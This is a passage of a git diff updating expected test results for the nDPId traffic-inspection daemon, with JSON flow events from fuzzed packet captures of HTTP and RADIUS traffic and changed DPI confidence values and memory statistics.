00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1031854514843,"flow_last_seen":1031854525904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":425,"flow_tot_l4_payload_len":568,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1031854532142,"flow_last_seen":1031854543315,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1823,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1031854532142,"flow_last_seen":1031854543315,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1823,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854535021,"flow_last_seen":1031854546079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7580000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1031854557802,"flow_last_seen":1031854568982,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4508,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1031854557802,"flow_last_seen":1031854568982,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4508,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854562320,"flow_last_seen":1031854562528,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854562320,"flow_last_seen":1031854562528,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -206,9 +206,9 @@ ~~ total active/idle flows...: 39/39 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5926060 bytes -~~ total memory freed........: 5926060 bytes -~~ total allocations/frees...: 118413/118413 +~~ total memory allocated....: 6059694 bytes +~~ total memory freed........: 6059694 bytes +~~ total allocations/frees...: 121175/121175 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 201 chars ~~ json string max len.......: 2426 chars diff --git a/test/results/fuzz-2020-02-16-11740.pcap.out b/test/results/fuzz-2020-02-16-11740.pcap.out index ce496910a..08d272332 100644 --- a/test/results/fuzz-2020-02-16-11740.pcap.out +++ b/test/results/fuzz-2020-02-16-11740.pcap.out @@ -2,25 +2,25 @@ 00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1528996067791} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996067791,"flow_last_seen":1528996067791,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996067791,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"108.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01388{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1528996067791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528996067791,"pkt":"AAAMB6xAABRP+4rqCABFAALbIMZAAP8RAAAKDEAebOIZNXIQBxQCxwAAAQoCv14OK3h3MxRiiuPV6g7+kV4aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADikDQM2NwZbIqDjATUwMzExNDgwMjeaNTE2NDgwQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZmMtZGItYjMtMDgtZmYtMTQeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XVkZpd2NjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLUlkPTEwZmYxMGFjMDAwMDAwYjFkMWEwMjI1YiwgNWIyMmEwZDEvZmM6ZGI6YjM6MDg6ZmY6MTQvMjA1BAasFAEQIA5WWldDMlRlc3RMYWI6DAAAN2MBBgAAAAIGBgAAAEQlAAAABRQ9BgAAABNABgAAAA1BBgAAAAZRRTU2TzoCAQA4ATAzMTE0ODAyNzE1MTY0ODBAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm+qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996067791,"flow_last_seen":1528996067791,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996067791,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"108.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996067791,"flow_last_seen":1528996067791,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996067791,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"108.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996068005,"flow_last_seen":1528996068005,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528996068005,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.102.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00634{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1528996068005,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528996068005,"pkt":"ABRP+4rqcNuYVcUnCABFAACl7dxAAPwRZijG4hk1CmZAHgcUchAAkTltCwoAiSM4ARafmcO5UlnZgWS\/VrEBNTAzMXE0ODAyNzE1MTY0ODBAd2xhbi5tbmM0ODAufWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmEwZDEvZmM6ZGI6YjM6MDg6dmY6MTQvMjA1Tw4BAgAMFwwAAAwBQABQEpOK5mo0k\/FCxgtYc0d6dIg="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996068005,"flow_last_seen":1528996068005,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528996068005,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.102.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996068005,"flow_last_seen":1528996068005,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528996068005,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.102.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996068129,"flow_last_seen":1528996068129,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528996068129,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01324{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1528996068129,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"thread_ts_msec":1528996068129,"pkt":"AAAMB6xAABRP+4rqCABFAAKrIMdAAP8RAAAKDEAexuIZNXIQBxQClwAAAQsCj4S+BLJeRUI2j+crsJkatvQaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUiUAGgkAADghDQM2NwZbIqDkATUwMzExNDgwMjcxNTE2NDgwQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZmMtZGItYjMtMDgtZmYtMTQeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYjFkMWEwMjI1YiwgNWIyMmEwZDEvZmM6ZGI6YjM6MDg6ZmY6MTQvMjA1BAasFAEQIA5WWldDMlRlc3RsYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TwoCAgAIFwwAABoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARMVBoQAAAlAAoKU3RhbmQ5cmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAGCESD0ludmFsQmQgVmFsdWUaHQAAOCETFzQwLjgwNDg4JQAtNzQuMTAyODNVVxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVAS3TFDXZx6RcHx5Q8nnMq0Ng=="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996068129,"flow_last_seen":1528996068129,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528996068129,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996068129,"flow_last_seen":1528996068129,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528996068129,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1528996068284,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":257,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":257,"pkt_l4_len":223,"thread_ts_msec":1528996068284,"pkt":"ABRP+4rqcNuYVcUnCABFAADz7eFAAPwRZdbG4hk1CgxAHgcUchAA39JxAwsA1+U\/DuIEVKatp1a5Vz8iUQkBNTAzMTE0ODAyNzE1MTY0ODBAd2xhbi5tbmM0ODAubaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":5,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528996520702} 01281{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528996068284,"pkt":"AAAMqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1528996520912,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528996520912,"pkt":"AFFP+4rqcNuYVcUnCABFAADh9PZAAPwRXtPG4hk1CgxAHgcUchAAzf\/ACwwAxUX8kZJ5SD1GIY9b3TLnaCUBNTAzMTEjODAwNzM2MzgwNzJAd2xhbi5tbmM0MDAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmEwZmQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjA2T0oBAgBIFwEAAAEFAACzfR5W9eh2OghNxDwVbojaAgEAABPTIXEVtgAALhLyMDDdAueLAQACCwUAJQD\/wh144KSIGN1E2YBCoTFQEji6recwpo2EGDX0tsWSQ1s="} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996521324,"flow_last_seen":1528996521324,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528996521324,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1796,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01361{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1528996521324,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528996521324,"pkt":"AAAMB6xAABRP+4rqCABFAALHIMlAAP8RAAAKDEAexuIZNXIQBwQCswAAAQ0CqzlVBXH\/qH48qbcRRfwKWygaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMyNwZbIqKpATUwxjExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3Bwbhp0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTBVLWE3LDQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBTUAAAAIGjEAAAAJASthdWRpWS1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYjJmZWEwMjI1Yqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 